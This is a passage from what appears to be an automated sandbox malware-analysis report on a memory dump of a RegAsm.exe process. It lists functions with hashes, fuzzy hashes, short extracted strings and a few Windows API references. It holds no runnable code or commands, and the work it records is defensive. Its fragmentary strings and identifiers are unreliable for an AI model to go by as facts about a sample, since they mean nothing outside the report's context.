Opcode Fuzzy Hash: c5ab0d83e64b765c744701c2e6a3dd54d72007aada7ab799a775c92818878a9a
Instruction Fuzzy Hash: 695116B0908B828FD711BF78D94935EBFA0AF16314F04863AE49597282D3BD9458C7E7

Function 004177A4 Relevance: 8.7, Strings: 6, Instructions: 1163COMMON

Download Yara Rule

Strings

MNO, xrefs: 00417EC9
@uEw, xrefs: 004182F6
Ea2c, xrefs: 00418325
'qDs, xrefs: 004182EE
l, xrefs: 00417AD8
8, xrefs: 0041822A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: MNO$'qDs$8$@uEw$Ea2c$l
API String ID: 0-1478982728
Opcode ID: db6b3cbe7602d84f43cf26b283f83ad189eeabba7c3eaadd3739341c62401ca3
Instruction ID: d66677af7f46fa48f5d831ee8903b6c68a7fe691e51a70b10a625e1ad4b0ed12
Opcode Fuzzy Hash: db6b3cbe7602d84f43cf26b283f83ad189eeabba7c3eaadd3739341c62401ca3
Instruction Fuzzy Hash: D6821475508341CBD724CF28C8957ABBBF1EF85314F18896EE4C58B2A1EB388985CB56

Function 0041CC80 Relevance: 6.8, Strings: 5, Instructions: 523COMMON

Download Yara Rule

Strings

j9K7, xrefs: 0041CE4B, 0041CE4F, 0041CED0, 0041CF99, 0041D019
9A#_, xrefs: 0041D0FE
7E5C, xrefs: 0041D0F6
wr, xrefs: 0041D2C6
;M.K, xrefs: 0041D0E6

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 7E5C$9A#_$;M.K$j9K7$wr
API String ID: 0-4097657610
Opcode ID: 361344e64c717f1abd1277ee507242e0bf15e41fec067ba333a7a2ca8559a8ee
Instruction ID: 4e5db6c2e9bc0a6f0aeea77cf5e78c4a90e7c3c2541c1f9cc0d05f237dd9c99d
Opcode Fuzzy Hash: 361344e64c717f1abd1277ee507242e0bf15e41fec067ba333a7a2ca8559a8ee
Instruction Fuzzy Hash: 9AF1CBB15093409FE704DF25D8856AFBFE1EBD6308F44882CE4D95B352E7388A09CB96

Function 0043E310 Relevance: 5.9, Strings: 4, Instructions: 900COMMON

Download Yara Rule

Strings

$ I, xrefs: 0043E891
RC, xrefs: 0043E447
WC, xrefs: 0043EC1F
$ I, xrefs: 0043E82A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ I$$ I$RC$WC
API String ID: 0-2323756607
Opcode ID: 24d58e82427fc5db125ee5c815e98226cb73580137d01ae2fb7e82879f6743bd
Instruction ID: 938cbc612288e449278308d0176e667873219fae9562f2af79206c65961d549c
Opcode Fuzzy Hash: 24d58e82427fc5db125ee5c815e98226cb73580137d01ae2fb7e82879f6743bd
Instruction Fuzzy Hash: E752153A609211CFC704CF29D89066BB3E2FB8A314F1A887DD98687391D734EC45DB85

Function 0040A7F0 Relevance: 5.4, Strings: 4, Instructions: 409COMMON

Download Yara Rule

Strings

|PZn, xrefs: 0040A810
#%AN, xrefs: 0040ABB4
oh, xrefs: 0040A988
akR*, xrefs: 0040A808

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #%AN$akR*$oh$|PZn
API String ID: 0-1313271354
Opcode ID: f0ff41f4edb421aa38ac20c9499b34a4fdf42de6fc15facc3bab0176af4db418
Instruction ID: 76235340187427224ce28e16d0e78a905481e45630412617da8f8b2a5f981c02
Opcode Fuzzy Hash: f0ff41f4edb421aa38ac20c9499b34a4fdf42de6fc15facc3bab0176af4db418
Instruction Fuzzy Hash: C9C1CF726083918AD322CF29859076BFBE0AFD6304F09496DE5D45B382D379990ACB97

Function 00419599 Relevance: 4.6, Strings: 3, Instructions: 862COMMON

Download Yara Rule

Strings

H\Nm, xrefs: 00419B40
`b]}, xrefs: 00419870
K7, xrefs: 00419606

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: H\Nm$K7$`b]}
API String ID: 2994545307-2746128380
Opcode ID: 365136e593b9014b7ba6fb2a2ae801399c5478815072aa56bc4f28269ed2a898
Instruction ID: 5a67362f49ac71ea0561011bed0f96ee1cd95c4ac8f767d1ad8a0ba7206c8538
Opcode Fuzzy Hash: 365136e593b9014b7ba6fb2a2ae801399c5478815072aa56bc4f28269ed2a898
Instruction Fuzzy Hash: 003213756082418FE718CF24D8E17AB77A2FBC6304F18853ED0C657296DB34AD46CB9A

Function 0043E460 Relevance: 4.6, Strings: 3, Instructions: 824COMMON

Download Yara Rule

Strings

$ I, xrefs: 0043E891
WC, xrefs: 0043EC1F
$ I, xrefs: 0043E82A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ I$$ I$WC
API String ID: 0-2731690397
Opcode ID: e51e6ccc9d9cd53e8e40bc3c4d209de077e66b79c007857c9139232dfbc77439
Instruction ID: f752cdea028fb3e339c3e742166838eab025eed1c63fe0daa88208b857f4a7a0
Opcode Fuzzy Hash: e51e6ccc9d9cd53e8e40bc3c4d209de077e66b79c007857c9139232dfbc77439
Instruction Fuzzy Hash: ED42163A609211CFC708CF39D89066BB7E2FB8A315F1A897DD98687391D734AC05DB85

Function 0043E6D0 Relevance: 4.5, Strings: 3, Instructions: 749COMMON

Download Yara Rule

Strings

$ I, xrefs: 0043E891
WC, xrefs: 0043EC1F
$ I, xrefs: 0043E82A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ I$$ I$WC
API String ID: 0-2731690397
Opcode ID: 0428238a7283722af7fa24e433882eaa202ce5cf62c8ca71d604234615ddb8ab
Instruction ID: fba35a6bb56eb607c20a54b322c0e229765f5d0149c8b80925fb591f936d99cd
Opcode Fuzzy Hash: 0428238a7283722af7fa24e433882eaa202ce5cf62c8ca71d604234615ddb8ab
Instruction Fuzzy Hash: 7D32F476A09211CFC708CF29D89066BB7E2FB8A310F1A897DD99697391D734AD05CB84

Function 0043E5D0 Relevance: 4.5, Strings: 3, Instructions: 736COMMON

Download Yara Rule

Strings

$ I, xrefs: 0043E891
WC, xrefs: 0043EC1F
$ I, xrefs: 0043E82A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ I$$ I$WC
API String ID: 0-2731690397
Opcode ID: dfca26cc17839b875841adbeabafde328774f070a2778fdc6f2e371495e0aa4b
Instruction ID: 023c68b4815638ea6b5de8db198d0e0aeed081bbf7d7bf96fd94eb994a65d267
Opcode Fuzzy Hash: dfca26cc17839b875841adbeabafde328774f070a2778fdc6f2e371495e0aa4b
Instruction Fuzzy Hash: 9F32153AA09211CFC704CF29D89066BB7E2FF8A314F1A897DD98697391D734AC05DB84

Function 00404DB0 Relevance: 4.1, Strings: 3, Instructions: 386COMMON

Download Yara Rule

Strings

QR@, xrefs: 0040524A
]@, xrefs: 00405311
bN@, xrefs: 00404E4C

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: QR@$bN@$]@
API String ID: 0-1454939148
Opcode ID: d975215b0833da11e8ff0da63a96a6a5380c90c47e7bf33e4f54447783d60497
Instruction ID: 409b831b166ed3267c7c921de06081143a15a41b7f93223b72a204a9b2121e7c
Opcode Fuzzy Hash: d975215b0833da11e8ff0da63a96a6a5380c90c47e7bf33e4f54447783d60497
Instruction Fuzzy Hash: 5BE18579618202CFD708CF28E8907AA7BE1FB89355F19893DE88587380D739D955CF85

Function 00429E92 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

](_, xrefs: 0042A062
7MO, xrefs: 0042A046
UVW, xrefs: 0042A070

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 7MO$UVW$](_
API String ID: 0-52917373
Opcode ID: ec990f6b8f150a2057d078782cdcb4a853c155cc28f1b8686f8511c6cc3e2a2b
Instruction ID: e8bf0527e35f45c7106cc978a506d398feaa5071be6b6f43cbc971a8a412cf46
Opcode Fuzzy Hash: ec990f6b8f150a2057d078782cdcb4a853c155cc28f1b8686f8511c6cc3e2a2b
Instruction Fuzzy Hash: 0681D2B1A002558FCB14CF69C892BAEBFB1FB49310F5A41ADD851AF396D774C802CB94

Function 00425B60 Relevance: 4.0, Strings: 3, Instructions: 216COMMON

Download Yara Rule

Strings

*q$s, xrefs: 00425D06
1M/O, xrefs: 00425D7D
DE, xrefs: 00425D8D

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *q$s$1M/O$DE
API String ID: 0-3557350939
Opcode ID: f927958a74660fad86443d8c5aec0de8830bb78726ef562df43afe54aa317711
Instruction ID: 2fd6102c5b436db6c10ae52dd7815ed8dfcf53b5963e6e6b474c9b99ee791aaf
Opcode Fuzzy Hash: f927958a74660fad86443d8c5aec0de8830bb78726ef562df43afe54aa317711
Instruction Fuzzy Hash: 6C6133B06183548BD7149F25EC9176BBBF0EF82324F448A2DF4D55B381E7788A05CB9A

Function 00431AB1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431B5B

Strings

0, xrefs: 00431CFA

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: fcf037e91db3a43eada9f8769d377d66d2d89dc594c7ca32dab59883f6971274
Instruction ID: 806660ce62260e42a038a34c4ced2b1d0a7619c2f76fa2559911f261d613459b
Opcode Fuzzy Hash: fcf037e91db3a43eada9f8769d377d66d2d89dc594c7ca32dab59883f6971274
Instruction Fuzzy Hash: 23910861508BC08ED316CB3C8848712BE925B66228F2D86DDD1A94F7D3C7BBD507C766

Function 004161A0 Relevance: 3.1, Strings: 2, Instructions: 572COMMON

Download Yara Rule

Strings

`a, xrefs: 004165EC
?4, xrefs: 00416909, 00416790, 00416910

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ?4$`a
API String ID: 0-1628703020
Opcode ID: c344bcd08152b552111d13140194012b2970a54b3a23fb7078c4c524cd72c9c7
Instruction ID: 998b046d8089e07141c9358b02b80add56115170f1e8aa5b75e3e5ae490ce764
Opcode Fuzzy Hash: c344bcd08152b552111d13140194012b2970a54b3a23fb7078c4c524cd72c9c7
Instruction Fuzzy Hash: 42021475508340DBD7249F24D8427EB77E1EF96314F05893EE4C98B392EB788981CB9A

Function 004043C0 Relevance: 2.9, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

), xrefs: 0040443D
IEND, xrefs: 0040481D

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: d1e3aeff324e7164f59c5245b03e5a93c6aeb7242913d909bb75f28ccbfdac2c
Instruction ID: 40729f6cbe1c377323bcc2df022ecc726e090c578c1f8db908f8f45469e698a3
Opcode Fuzzy Hash: d1e3aeff324e7164f59c5245b03e5a93c6aeb7242913d909bb75f28ccbfdac2c
Instruction Fuzzy Hash: 7EE1B1B1A08741AFD310DF29C84071BBBE0BB95314F14493EEA94A73C2E779E915CB86

Function 00427A3A Relevance: 2.8, Strings: 2, Instructions: 285COMMON

Download Yara Rule

Strings

2-y, xrefs: 00427D9D
2-y, xrefs: 00427D51

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 2-y$2-y
API String ID: 0-470317599
Opcode ID: f3dc3d5d81e71c315451def8d7bd34ffffe5f0223f412d0c99732bc5015442e3
Instruction ID: 7bd5b8c12f619d6af7776c1ac557059d4d4d660691da9d4fd5925ff304cfcffa
Opcode Fuzzy Hash: f3dc3d5d81e71c315451def8d7bd34ffffe5f0223f412d0c99732bc5015442e3
Instruction Fuzzy Hash: 149104B2A083248FC318CF29D89532BB7D2ABC5314F59853DD9958B391EB78EC05CB85

Function 0043ACC0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

f, xrefs: 0043AEBF

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 99b6ec62d15a866f8b2b4cac660dbeb31c69a96333fede2cb5bd034bf87eda0a
Instruction ID: 967a52e1025406f487be8f11714670aa13b61fa7cc3479427936dd3b13bb1a32
Opcode Fuzzy Hash: 99b6ec62d15a866f8b2b4cac660dbeb31c69a96333fede2cb5bd034bf87eda0a
Instruction Fuzzy Hash: 6A1227716483418FD714CF29C89076BBBE1EBC9314F18862EE5D597392EB38D905CB86

Function 00422480 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004425A8,00000000,00000001,00442598), ref: 004224A9

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6b3e9b179ee5b9027661defaec72ccd74ab8bdc2ad03d2eece7d096b0243df6e
Instruction ID: 7d3fbc484a2c01e7a0915aeb2194f32256946e73656f87647ab4e421457b1832
Opcode Fuzzy Hash: 6b3e9b179ee5b9027661defaec72ccd74ab8bdc2ad03d2eece7d096b0243df6e
Instruction Fuzzy Hash: AA51EDB2700220BBDB209B24DD96B7733B4EF81358F488519F9858B391F7B8D941C72A

Function 0042AAF0 Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

", xrefs: 0042AE47

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 5bda72eac8a190dfd4681b78c8f8c5144f583b127f72fd160bdc29349a2f7f50
Instruction ID: 0bafc1c2e76d874e2948d10f32663e2891329d8cf8e3695174a8e404f2b2ee4e
Opcode Fuzzy Hash: 5bda72eac8a190dfd4681b78c8f8c5144f583b127f72fd160bdc29349a2f7f50
Instruction Fuzzy Hash: 9ED1F572B083255FC714CE24E48076BBBE6AB84314F99852EEC9987382E778DC55C787

Function 0042660F Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

':%, xrefs: 00426939

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ':%
API String ID: 0-2029017901
Opcode ID: c95904ab04645496f572c31ec67b5ae0c81f470576fcfeac52894b4b04ec7a41
Instruction ID: 0b0610fa49d886d8b60cc2dd257a94c86066073b6b3237c0290a7b5f297b14a4
Opcode Fuzzy Hash: c95904ab04645496f572c31ec67b5ae0c81f470576fcfeac52894b4b04ec7a41
Instruction Fuzzy Hash: 3DA18F32E052718FD7148B68A8801BBB7A2EF95364F5B8277C8516B3D2D3389D06D3E5

Function 00427DD2 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

~B, xrefs: 00427E3B

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ~B
API String ID: 0-3445612632
Opcode ID: ddd2abe592b6f619cc7b6c2959b5ac8e194551a6ac9ce504d80809b12479a225
Instruction ID: 5a66abe5c9a8eeccee8ae3efb68996f7ec5a758da6bc5b2750616c46124ef864
Opcode Fuzzy Hash: ddd2abe592b6f619cc7b6c2959b5ac8e194551a6ac9ce504d80809b12479a225
Instruction Fuzzy Hash: A6B14435A08361CFE724CF289C9032AB7A2BF86310F5A867DD9D5873D1DB349C158746

Function 0041DF10 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

~, xrefs: 0041DFDD

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 36a89913e6d079b0a8516d6cde7e2f880900965ee0cabc9329afe3fc65237b1e
Instruction ID: 9ce33138119414619301131519568d3efb9050b5a8bb39bea86b94d814511401
Opcode Fuzzy Hash: 36a89913e6d079b0a8516d6cde7e2f880900965ee0cabc9329afe3fc65237b1e
Instruction Fuzzy Hash: 8CA10676A042215FC715CE29CC4179BB7E1AB85324F19C53EECA9CB382D638CD46D785

Function 0042DF2D Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

J$R0, xrefs: 0042DF45

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: J$R0
API String ID: 0-1157465603
Opcode ID: 453151afe1bb61aab5de485787b52744bdee3083728a56ac566dbd045fd6edf7
Instruction ID: 49906bac361acb6874eeca078f6230d3675bf46a41e9e5953f9107bb85a85bf8
Opcode Fuzzy Hash: 453151afe1bb61aab5de485787b52744bdee3083728a56ac566dbd045fd6edf7
Instruction Fuzzy Hash: D7A1F6716047908FE325CF3AC4907A3BBD2AF92304F1889AEC0E78B786D77964058B56

Function 0042E2C7 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

J$R0, xrefs: 0042E2DF

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: J$R0
API String ID: 0-1157465603
Opcode ID: 74d57d6d5b180e7554d1c247906efafe275c28ee8a1cbf59c82199ebfd4d66e0
Instruction ID: fd70fabf01a5be82ad31599ecd77b5c24a3ddd4b4cbd38755907f6b363b2e95d
Opcode Fuzzy Hash: 74d57d6d5b180e7554d1c247906efafe275c28ee8a1cbf59c82199ebfd4d66e0
Instruction Fuzzy Hash: C591D775604B908FE325CF3AC4907A3BBD2AF56304F58896ED0E78B785D778A405CB16

Function 00406540 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

,, xrefs: 004066B3

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 74f21635afe2c8cbf920dc5400391eb17da6523195f1f46e0cdfd79d6e9ca258
Instruction ID: 8defe553667cdfc08bf5e2b7c2aa7d5e31eb7bbc694bfab068edcb4fc5d9728c
Opcode Fuzzy Hash: 74f21635afe2c8cbf920dc5400391eb17da6523195f1f46e0cdfd79d6e9ca258
Instruction Fuzzy Hash: D8B128711093819FD324DF28C89061BBBE0AFA9704F448E2DF5D997382D675E918CB57

Function 00418CAA Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

gfff, xrefs: 00418E1F

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: e2833e8abeec3101b4d0da1c067d99dda2a93f866007377eafa40e846367ae57
Instruction ID: 03b3cc61a5ff0f5fd164d08df79e664cff1117471fa920e7892d3ced472177d3
Opcode Fuzzy Hash: e2833e8abeec3101b4d0da1c067d99dda2a93f866007377eafa40e846367ae57
Instruction Fuzzy Hash: 6C715572A142504BE728CF38DC527AF76D2ABC5318F18863EE486D7391EB3C984587C5

Function 0041B5C0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

_, xrefs: 0041B6E8

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: ee65d6b3c06229c16ba81a7a9c74a5fb8a519d042406f35bd92bdc76f10703e3
Instruction ID: bcf338c3562dc5e218c57fe8ccc3922250a09dff5745d2f48a271366033b7a1f
Opcode Fuzzy Hash: ee65d6b3c06229c16ba81a7a9c74a5fb8a519d042406f35bd92bdc76f10703e3
Instruction Fuzzy Hash: 7D711A156185420ADB2CCF748993337BAE6EF84308F2891BFD956CF69BE57CC5028789

Function 00425872 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

:[B, xrefs: 00425B34

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: :[B
API String ID: 0-387980663
Opcode ID: 6473f292ac003eb816fd2cd033f7e345a48810cd4373ff024cf234cede564cb5
Instruction ID: 3af2c7b2b480148334eade2da4c23ee6d42e1d69f46c115d51beb0d452e07a29
Opcode Fuzzy Hash: 6473f292ac003eb816fd2cd033f7e345a48810cd4373ff024cf234cede564cb5
Instruction Fuzzy Hash: BD619A72B08765CBD7209E24A8813BBB7E0EB51310F88493FC9C5C7341E6789849E796

Function 0043A8A0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

5|iL, xrefs: 0043AAB0

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 5|iL
API String ID: 0-1880071150
Opcode ID: c4094058e67deb64e4a381a9dbb80c7177d3f049e3857a0e19f18d0cc0321833
Instruction ID: e44991d4063ba048b35ce64b121b345dff1f5c71710d3d83f1540ebd274c4fdd
Opcode Fuzzy Hash: c4094058e67deb64e4a381a9dbb80c7177d3f049e3857a0e19f18d0cc0321833
Instruction Fuzzy Hash: E3511376A442108FD7149E38CC8165BB7A2EBC8314F1AD53ED8D6DB3A5DA38DC11CB86

Function 0041C9EA Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

@A, xrefs: 0041CA9A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @A
API String ID: 0-2960862460
Opcode ID: 5a1ba30b9fd0b7e74a6d316634dd2b875b6ffa8121977861751911780c9f0308
Instruction ID: ad46a02c083bf8bd1d38adc19c8a3a175abe50cc568aea689b1047bed3ea517c
Opcode Fuzzy Hash: 5a1ba30b9fd0b7e74a6d316634dd2b875b6ffa8121977861751911780c9f0308
Instruction Fuzzy Hash: 9D5157715483418BC7158F25D8E27B7BBF0EF96364F28491DE4D25B391E3389881C79A

Function 00432460 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00432547

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
API String ID: 0-2272463933
Opcode ID: 0540a291337446644ad3c85d2b4b71444e144f8c51948085fdafbb6fe4ccc025
Instruction ID: b97322e278e4b55e0d80d17760ddc995b3df68d074ddf16a1c6b943568c37a5c
Opcode Fuzzy Hash: 0540a291337446644ad3c85d2b4b71444e144f8c51948085fdafbb6fe4ccc025
Instruction Fuzzy Hash: BE5145367489914BD3288A3C5D612AA7A834FEB230F2CD76FF5F68B3E1D5D848024355

Function 0041BD60 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

, xrefs: 0041BD68

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 460d4175d065a7ccf7771760ee45c5fd97b4796a24213aa28cdeaae075a499d0
Instruction ID: 58e49573034e5cb7ee9448db16b8a580a477997ac56c7fb49439c70cb913bc44
Opcode Fuzzy Hash: 460d4175d065a7ccf7771760ee45c5fd97b4796a24213aa28cdeaae075a499d0
Instruction Fuzzy Hash: 3F110676A0C34147D7188F3488913BBEBD2EBD6228F1CD26ED4D5A3392D73898468649

Function 00408A70 Relevance: .8, Instructions: 827COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84778d61f40eff79588bebcc2ecd90fc72d2700e984d51e76272e03028c82578
Instruction ID: a359064f2f450e4416cf0eb0fb441e10617bd0344838f17856e370d6e15995a7
Opcode Fuzzy Hash: 84778d61f40eff79588bebcc2ecd90fc72d2700e984d51e76272e03028c82578
Instruction Fuzzy Hash: 9052B0315087118BC725DF18D58026BB3E2FFD4314F298A3ED9D6A7386D739A852CB86

Function 00412F5C Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
